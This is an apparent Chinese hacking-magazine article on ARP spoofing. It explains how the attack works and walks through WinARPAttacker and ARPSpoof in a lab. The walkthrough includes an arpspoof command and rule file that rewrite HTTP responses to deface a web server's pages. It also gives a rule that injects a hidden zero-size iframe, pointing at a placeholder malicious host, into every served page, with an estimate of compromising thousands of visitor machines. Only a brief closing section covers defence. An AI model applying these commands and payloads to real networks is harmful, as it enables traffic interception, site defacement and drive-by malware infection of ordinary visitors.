防不胜防ARP欺骗

firecow

目前的入侵趋势，由于远程溢出和脚本攻防已被逐渐重视，而且现在溢出工具和注入工具满天飞，所以现在入侵已没有那么容易了，如果你发现哪个服务器还有远程溢出漏洞或是注入点，那么八成早就有一个排的人入侵过这里了。

无论做什么，思想是第一位的。入侵的思想就是渗透，如果你要入侵某个网站，那你就需要收集一下这个网站的信息（比如这个网站用的是什么整站系统，网站有没有新漏洞，站长叫什么，搜索一下站长的名字，看看他还在哪里注册过，想想能否用社会工程学）。如果你无法直接入侵目标网站，那就应该看看这个服务器用的是什么操作系统，有没有打补丁，用什么架设的HTTP以及FTP，有没有其它软件（如PCAnywhere，Radmin，SOL Server），上面还有没有其它网站，能否从这些网站突破。如果还不行，你就可以看看与这台服务器在同一网段的其它服务器有没有问题，有问题的话，就入侵进去，然后可以考虑从Sniffer和ARP方面下手了。这就是渗透思想，是黑客技术的真谛。

目前社会工程学和基于TCP/IP的缺陷（我指的是明文传输和ARP欺骗等）的入侵思路逐渐流行起来，下面我们就来谈谈ARP欺骗。关于ARP欺骗的原理，还是先听听高手们的解释。

一台主机A如果要向目标主机B发送数据，无论主机B在本网段还是在远程网络，这些需要发出去的数据包中需要四样必不可少的地址，那就是源IP地址和源MAC地址，以及目标IP地址和目标MAC地址。当主机B在封装数据包时，自己的IP地址和MAC地址可以正确地轻易地封装进去，目标IP自己也知道，也可以封装进去，关键在于目标MAC该如何得来。由于主机A曾经和主机B发生过通信，曾经通过ARP得到过目标主机的MAC地址，那么它就会把主机B的IP地址和MAC地址对应地记录下来，放在缓存表中，以备下一次再使用。但要说明的是，因为考虑到主机B有更换网卡的可能，所以无论何时当主机A再次收到关于主机B的MAC地址更新信息，它都将刷新自己的ARP缓存表，将新收到的MAC地址和主机B的IP地址对应起来。正因为主机A在任何时候收到ARP数据包，都将再次更新ARP缓存，所以导致了另外一个令人头疼的事情发生。

如果现在一台不怀好意的主机C想要窃取网络中的数据或者其它目的，那么这时它就可能向A发送一个ARP数据包，数据包中声称主机B的MAC地址已经改变，当主机A收到后，得知此消息，就立刻更新原来主机B的MAC地址，当它要和主机B进行通信时，就会在数据包中封装新的MAC地址，如果这个MAC地址是前面主机C的，那么主机A就会把本来要发给主机B的数据错误地发给了主机C，被主机C窃取成功，而主机C为了掩人耳目，“看”过数据后，再发给主机B，从而不影响主机A和主机B之间的正常通信。但如果前面主机C发给主机A的ARP更新包中的MAC地址不是自己的，而是伪造的根本不存在的MAC地址，那么这时主机A和主机B之间就不可能再正常通信了，这就是ARP病毒对PC主机在网络间通信造成的严重威胁和后果，造成数据被窃听或网络不通的惨局！如果它不仅看过数据包，而且还修改一下，带来的危害就更大了。

虽然局域网之间通信是主机与主机之间直接通信，但如果要与外网的主机通信，还需要用到网关或路由器（很多情况下，一个局域网的路由器就直接充当网关的角色），当局域网内的某台主机A想要与外网的主机通信，那么这时它在对数据包进行封装时，目标MAC地址需要写成网关的MAC地址，再交由网关代为转发到网外去。如果这台主机A在使用ARP数据包请求网关的MAC地址时，出现一台不怀好意的主机向主机A回应了一个ARP回应报，数据包中就将这台病毒主机或者根本不存在的MAC地址告诉主机A，那么这时主机A发给远程网络的数据由于经过不怀好意的主机“中转”了一下，造成数据被窃听，或因为错误的目标MAC，而最终网关没有对数据进行转发，导致与外网不能正常通信。这就是为什么ARP病毒不仅能够从主机下手来影响局域网内的通信，也能影响局域网与外网通信的原因。下面我们就来看看如何利用ARP进行攻击。

WinARPAttacker IP冲突用法

在使用WinARPAttacker之前，我们要先安装WinPcap3.1驱动，这很简单，直接点击安装即可。运行WinARPAttacker之后，先点击Scan，搜索一下局域网里的主机，然后在要攻击的IP前打勾，就可以攻击了，如图1和图2所示。



ARPSpoof修改首页

我汉化了这个ARPSpoof，首先强烈感谢软件作者无私公开源代码。使用之前和上面一样要先安装WinPcap3.1驱动。运行之后有很详细地说明，如图3所示。



做这个程序的演示需要在局域网里，但是我没有这个条件，只好用虚拟机再虚拟出两台机器，和我现有的这台机器组成局域网。我们这些玩网络安全的人，没有虚拟机是无论如何也说不过去的，我的虚拟机上就装有4个操作系统。192.168.58.1是网关（也就是我的电脑，另外两台是虚拟出来的），192.168.58.3是Web服务器，192.168.58.2就是欺骗者了。首先看看网关192.168.58.1的情况，如图4所示；再来看看Web服务器192.168.58.3的情况，如图5所示；欺骗者192.168.58.2的情况如图6所示。





下面我们开始欺骗攻击。在欺骗者192.168.58.2上运行命令“arpspoof /n”，以在当前目录下生成一个hack.txt的规则文件，其默认内容如下：

----

<hea

----

这可不是我黑的 by 人鱼姬<noframes>

----

<HEA

----

这可不是我黑的 by 人鱼姬<noframes>

----

这段代码的意思是说凡是在数据包里遇到“<hea”，就将其替换为“这可不是我黑的 by 人鱼姬<noframes>”，遇到“<HEA”时同样替换，大家可根据需要自行修改，其中head是HTML语言中常见的标签。我们要做的就是当Web服务器的HTTP数据报文经过欺骗者的时候，把其中的head标签修改一下，这样首页就被篡改了。

firecow

我们先在欺骗者上输入命令：arpspoof 192.168.58.3 192.168.58.1 80 0 0 /r hack.txt，然后在网关上打开Web服务器的任意一个网页，哪怕这个网页不存在，都会有如图7所示的效果。


我们现在再看看Web服务器上的情况，如图8所示。虽然显示的是网关和本地的80端口有通信，但是网关MAC地址却和欺骗者一样。此时，欺骗者上的ARPSpoof回显如图9所示，表明ARP攻击已经实现了。





用ARPSpoof大量挂马

我们周围总是存在一些喜欢到处挂马的朋友，虽然我从来不提倡这种行为，但还是讲讲如何用ARPSpoof大量挂马的方法，仅供大家研究学习。

我们将ARPSpoof的规则文件做如下修改，即可实现大量挂马。

----

</html>

----

<iframe src="http://网马地址" width="0" height="0" frameborder="0"></iframe> </html>

----

</HTML>

----

<iframe src="http://网马地址" width="0" height="0" frameborder="0"></iframe> </html>

----

由于每个网页都会带有HTML标签，如果我们根据这个规则欺骗的话，被欺骗的服务器上每个网页（包括输入一个不存在的文件名所返回的404 not found网页）都会被挂马。传统的挂马一般都要在服务器上取得一些权限才可以修改网页，但是这种方法无需你入侵进去，只需控制与该服务器同属一网段的主机就可以了。我们不妨算一下，如果你入侵了某服务器，与该服务器同处一网段的服务器还有30台，每台上有30个网站，从理论上讲，就可以用ARP欺骗至少在900个网站上挂马了。保守计算，如果每个网站给你带来10个肉鸡，那么你差不多就有上万台肉鸡了，真是可怕呀。与传统挂马不同的是，网站站长不会在他们的网站上发现任何问题，因为服务器上的文件没被修改，但是远程访问时却会被挂马。

防护工具Anti ARP Sniffer

Anti ARP Sniffer可以实时检测网关的ARP地址是否被更改，如果网关的ARP地址被更改，软件会自动提示并记录对方的MAC地址。对于担心被ARP欺骗的用户来说，这款软件是个不错的选择，如图10所示。不过这款软件只能保证你不被骗，要彻底杜绝ARP欺骗，还要让网关不被骗才行哦。


上面我简单地介绍了一下关于ARP欺骗的原理，以及如何利用现成的工具实现ARP欺骗攻击和简单防护，希望能对大家有所启发。当然，如果你对ARP欺骗有自己的独到应用，还希望能够不吝赐教，在黑防发表出来，我们一起讨论进步。